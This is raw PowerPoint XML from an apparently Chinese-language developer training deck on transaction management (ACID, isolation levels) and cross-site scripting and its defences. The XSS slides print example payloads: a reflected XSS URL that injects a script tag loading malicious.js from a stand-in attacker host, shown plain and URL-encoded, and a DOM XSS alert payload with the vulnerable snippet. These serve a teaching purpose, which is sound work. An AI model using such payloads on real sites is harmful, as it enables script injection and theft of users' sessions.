        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931504"/>
            <a:ext cx="1028184" cy="2290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6" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7855129" y="3099308"/>
            <a:ext cx="849415" cy="4572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27" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7855129" y="3556508"/>
            <a:ext cx="849415" cy="1208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1" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2645339" y="979216"/>
            <a:ext cx="1015658" cy="1952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23" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2645339" y="2931504"/>
            <a:ext cx="1028184" cy="625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382025" y="297262"/>
            <a:ext cx="8592855" cy="138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圓角矩形 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3660997" y="47787"/>
            <a:ext cx="2401600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UnChecked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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3673523" y="2014211"/>
            <a:ext cx="2389074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Checked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423" y="59595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Try{…}catch{…}finally{…}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1" y="1783011"/>
            <a:ext cx="8934253" cy="491145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171167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JSP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240049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TxBean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308931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弧形向右箭號 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102290" y="2379945"/>
            <a:ext cx="250521" cy="416735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向右箭號 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059140" y="2771628"/>
            <a:ext cx="293671" cy="596934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向右箭號 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046614" y="3338382"/>
            <a:ext cx="306197" cy="543746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>
            <a:off x="789140" y="3839247"/>
            <a:ext cx="563671" cy="2178818"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22693"/>
              <a:gd name="adj2" fmla="val 56341"/>
              <a:gd name="adj3" fmla="val 327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下彎) 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847573" y="200416"/>
            <a:ext cx="209184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下彎) 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6943594" y="200416"/>
            <a:ext cx="220040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下彎) 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6939419" y="1423861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箭號 (下彎) 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4719734" y="1436942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「exception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97" y="432984"/>
            <a:ext cx="1091298" cy="10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Transaction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交易管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="流程圖: 結束點 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875777" y="1651521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begin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838200" y="272314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交易活</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>動</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="流程圖: 決策 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537575" y="3632871"/>
            <a:ext cx="2317315" cy="9269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交易正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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38200" y="490008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commit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469437" y="3808235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rollback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流程圖: 結束點 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875777" y="5913256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end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1696232" y="2240245"/>
            <a:ext cx="1" cy="482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  <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696233" y="3299343"/>
            <a:ext cx="0" cy="33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10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696233" y="4559797"/>
            <a:ext cx="0" cy="34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0" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1696232" y="5476283"/>
            <a:ext cx="1" cy="43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3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854890" y="4096334"/>
            <a:ext cx="614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1" idx="2"/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2510486" y="4390634"/>
            <a:ext cx="1823186" cy="18107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980" y="1964977"/>
            <a:ext cx="1104900" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="直線單箭頭接點 45"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6330216" y="3098690"/>
            <a:ext cx="626301" cy="458696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圖: 程序 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703914" y="3557386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54" name="流程圖: 程序 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114029" y="3557385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55" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="2"/>
            <a:endCxn id="54" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6956517" y="3098690"/>
            <a:ext cx="783814" cy="458695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2"/>
            <a:endCxn id="63" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9532703" y="3041302"/>
            <a:ext cx="680727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程序 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906401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64" name="流程圖: 程序 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10309859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65" name="直線單箭頭接點 64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="2"/>
            <a:endCxn id="64" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10213430" y="3041302"/>
            <a:ext cx="722731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向右箭號 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7799753" y="2357083"/>
            <a:ext cx="1594768" cy="588098"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41481"/>
              <a:gd name="adj2" fmla="val 6278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29" y="2041415"/>
            <a:ext cx="1171575" cy="1057275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1040" name="Picture 16" descr="「lightning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44" y="16175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文字方塊 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062353" y="4243521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542304" y="4243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9264840" y="4269583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0668298" y="4264378"/>
            <a:ext cx="5357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9" y="1728232"/>
            <a:ext cx="4276725" cy="1952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02135" y="1677353"/>
            <a:ext cx="229376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交易起始，寫在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>外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55543" y="2074070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資料異動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00483" y="2513132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交易完成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35419" y="2953901"/>
            <a:ext cx="405931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交易失敗，回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transaction.begin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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>狀態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35" y="986512"/>
            <a:ext cx="4286250" cy="1724025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 flipV="1">
            <a:off x="6063539" y="1848525"/>
            <a:ext cx="520196" cy="41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 flipH="1">
            <a:off x="4955543" y="327581"/>
            <a:ext cx="852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srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>內容須包含：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transaction.getDataSet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zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何取得連線名稱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838200" y="3158293"/>
            <a:ext cx="10515600" cy="4351338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如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>取得連線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((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JDBCTransaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>userTx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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DynamicDBModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>().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TransactionHelper.getInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getConnName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getConnName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ("DS_", null, Platform.NA);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122" y="3465453"/>
            <a:ext cx="4371975" cy="21907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160" y="3789750"/>
            <a:ext cx="5067300" cy="2000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096" y="4513058"/>
            <a:ext cx="6553200" cy="25717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144" y="4074752"/>
            <a:ext cx="6743700" cy="25717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4735" y="4968282"/>
            <a:ext cx="42767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交易四大原則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原子性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Atomicity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所有異動都要完成，否則回復至異動前的狀態</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一致性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Consistency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交易開始前和結束後，資料庫的完整性沒有被破壞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隔離</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Isolation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資料庫允許多個交易同時對資料進行更動，並防止多個交易同時執行時由於交叉執行而導致資料不一致</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>持續性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Durability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提交後的資料狀態須保存下來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9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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="59BF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Module A</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="流程圖: 程序 4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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="DB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Module B</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="流程圖: 程序 5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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="5AD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Module C</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="流程圖: 磁碟 7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9" name="直線單箭頭接點 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117850" y="3625139"/>
            <a:ext cx="2882900" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="59BF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2"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6000750" y="3625139"/>
            <a:ext cx="12700" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="DC7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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6000750" y="3625139"/>
            <a:ext cx="2908300" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="5AD6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35" y="2298591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Module A</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="流程圖: 程序 6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Module B</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="流程圖: 程序 7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Module C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90650" y="1885950"/>
            <a:ext cx="9220200" cy="2190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磁碟 9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12" name="直線單箭頭接點 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000750" y="4076700"/>
            <a:ext cx="0" cy="1255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540375" y="1942194"/>
            <a:ext cx="95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主程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11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84" y="2342304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8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隔離等級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Uncommitted:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指某個交易可以讀取另一個交易已更新但尚未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Committed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只允許讀取已認可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（已經成為資料庫永久部分的資料）。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 Repeatable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Read:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鎖定查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，以防止其他交易更改資料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Serializable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>某一交易所使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所有資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表，全部都會被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鎖定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>交易循序進行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78084"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4157598" y="298450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Phantom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Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Uncommitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>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Dirty read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15641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6" name="流程圖: 程序 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6288848" y="308472"/>
            <a:ext cx="1318452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4157598" y="647700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Dirty read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5802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(100-&gt;120)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Rollback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Unrepeatable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/>
              <a:t>Read Committed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只允許讀取已認可的資料（已經成為資料庫永久部分的資料）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Unrepeatable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6747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7952547" y="308472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8" y="1008857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649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Update(A) (100-&gt;200)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Phantom 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Repeatable Read:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鎖定查詢中的資料，以防止其他交易更改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Phantom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09035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9892884" y="333147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7" y="1395006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684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Insert(A) (200)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(100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29608"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10128729" y="4777875"/>
          <a:ext cx="18727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27143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3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031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17590"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10128729" y="3749628"/>
          <a:ext cx="187277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406206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1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82694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10128729" y="3749628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10119443" y="4770073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XSS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6228" y="3900100"/>
            <a:ext cx="119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Cross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46764" y="3912916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Site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78879" y="3900101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Scripting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2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hackertarget.com/xss-simple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365125"/>
            <a:ext cx="8603415" cy="61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94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XSS-Types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787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Reflection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>://localhost:8080/Demos/?username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“&gt;&lt;script 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=”http://myattacksite.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/malicious.js”&gt;&lt;/script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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DOM Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Http request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>//www.test.com/hello.html?name=test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Stored/Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS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613845" y="2217999"/>
            <a:ext cx="8229600" cy="879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http://localhost:8080/Demos/?username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3D%E2%80%9C%3E%3Cscript%20src%3D%E2%80%9Dhttp%3A%2F%2Fmyattacksite.com%2Fjs%2Fmalicious.js%E2%80%9D%3E%3C%2Fscript%3E%0A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784" y="56539"/>
            <a:ext cx="1176907" cy="1053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09" y="1099097"/>
            <a:ext cx="1148942" cy="11684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024" y="1066205"/>
            <a:ext cx="1062065" cy="1018892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="「mail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78" y="392613"/>
            <a:ext cx="528186" cy="5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單箭頭接點 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7488980" y="238715"/>
            <a:ext cx="1711660" cy="860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線單箭頭接點 2051"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7893700" y="820071"/>
            <a:ext cx="1410291" cy="692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線單箭頭接點 2056"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10029240" y="343464"/>
            <a:ext cx="1880370" cy="76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線單箭頭接點 2060"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10167973" y="1027906"/>
            <a:ext cx="1185828" cy="484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文字方塊 2088"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445894" y="3917405"/>
            <a:ext cx="739758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&lt;script&gt;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docmnent.URL.indexOf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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)+5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document.URL.substring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pos,document.URL.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2090" name="文字方塊 2089"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396819" y="3854394"/>
            <a:ext cx="6184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http//www.test.com/hello.html?name=&lt;script&gt;alert(1)&lt;/script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5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err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eBAF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1246" y="3868394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E-Business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9339" y="3870468"/>
            <a:ext cx="230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Application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40747" y="3882248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Framework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11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90600" y="1978025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Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>進行特殊字元與符號的跳脫或編碼處理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>白名單</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>過濾輸入字元（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Regular expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、字串長度）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
